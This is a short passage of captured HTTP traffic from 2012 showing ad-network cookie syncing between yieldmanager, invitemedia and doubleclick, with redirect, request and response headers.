P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Set-Cookie: BX=edelvjl8agei5&amp;b=3&amp;s=o4&amp;t=322;path=/; expires=Tue, 02-Jun-2037 20:00:00 GMT;domain=.yieldmanager.net S=s=4d9096l8ageih&amp;t=1353202257;path=/; expires=
Location: http://googleads.g.doubleclick.net/xbbe/match?xid=hwHeYpZjTRttBKyP9UR37yFj
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
GET /xbbe/match?xid=hwHeYpZjTRttBKyP9UR37yFj HTTP/1.1

Host: googleads.g.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 204 No Content

Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 18 Nov 2012 01:30:58 GMT
Server: xbfe
Content-Length: 0
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN